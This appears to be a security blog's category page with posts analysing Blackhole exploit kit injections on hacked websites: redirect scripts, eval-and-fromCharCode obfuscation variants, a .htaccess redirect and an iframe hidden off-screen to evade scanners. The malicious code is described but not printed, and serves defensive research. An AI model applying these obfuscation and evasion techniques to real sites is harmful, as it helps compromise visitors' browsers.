Category: Blackhole


Yesterday, Polonus addressed the issue on the avast! forums. Let’s check out the inform.htm.

First, review the VirusTotal results.

The malicious code is as follows:

inform.htm

As you can see, no obfuscation. They aren’t trying to hide anything. Maybe they are trying to reduce general AV detection. And the script looks simple enough, with a redirect to this podarunoki(dot)ru site…

Now we will look two at two urlQuery references: here and here.

Both of these sites, including the one given in the picture above, lead to .ru domains with :8080.

You can check for new malicious inform.htm sites on CleanMX,
~!Donovan

Found to infect another site with the Blackhole Exploit, a user reported this issue on the avast! forums. Confirmed with urlQuery and Sucuri, researching the blackhole site: Google says it has infected over 23 sites while Sucuri says it’s been used for redirection.

So, just how many scanners will detect this (Besides urlQuery and Sucuri of course)?

Interesting,
~!Donovan

Blackhole Exploit Please Wait Page

Blackhole Exploit Please Wait Page

 

Today, Polonus reported 2 Blackhole exploit sites here. Lets examine them. First, maolinsh:

Blackhole Exploit For mail.htm Variant 1

Blackhole Exploit For mail.htm Variant 1

So it tries to define n^ as eval, only to fail, thus the fallback to catch occurs. We see the general zxc for the catch statement that lots of Blackhole variants use. Define n as an array of numbers, then loop through it to add onto s with the fromCharCode() function. Then 2 if statements that will 99.9% return tells the browser to do the s string as javascript code (using eval).

Next up, destroya:

Blackhole Exploit For mail.htm Variant 2

Blackhole Exploit For mail.htm Variant 2

This one is the same as Variant 1, except a few differences. Variant 2 trys to define a variable as eval prototype. The second if featured in Variant 1 is also not present.

Both of these scripts deobfuscate to a iframer to a blackhole exploit hotspot. Both of these files are mail.htm. Searching on CleanMX reveals that there are others out there. Here is an example VirusTotal result. Only 2 detect.

Be prepared,
~!Donovan

Zappier Technology Homepage

Yesterday, this out-dated wordpress site was hacked. The webmaster took the immediate action required. Posting the information to the public. He reports his issue to the WordPress forum and the avast! community forum. They also ask for help at StackOverFlow, but the question was removed. Google Cache saves us in this case. Lets check some of the links our friend Pondus provided us. Sucuri SiteCheck tells us that the main site contains a redirect using the .htaccess file. A similar .htaccess hack was mentioned here. Various Blackhole exploit malware is also present in case the redirect is cleared. urlQuery returns ET CURRENT_EVENTS Blackhole Landing Page Eval Variable Obfuscation 3 and SPECIFIC-THREATS Blackhole landing page with specific structure – prototype catch with the severity of 1. Lets see why.

Zappier Technology JavaScript frmAdd() Function

Oh, nothing more than the typical hidden iframe that the BlackHole Exploit Kit uses.  By setting the top and left CSS rule of the iframe as -999em, it will be shown out of the user’s sight. This is to avoid being detected by scanners that search for low height and/or width. It leads to the BlackHole Exploit Hotspot,’Miami Tickets’. However, HostGator realized the malicious activity and closed the site. The user has yet to change the .htaccess rules, so the redirect to MercuryTutors is still there. Sucuri caught this behavior.

 
Stay Safe,
~!Donovan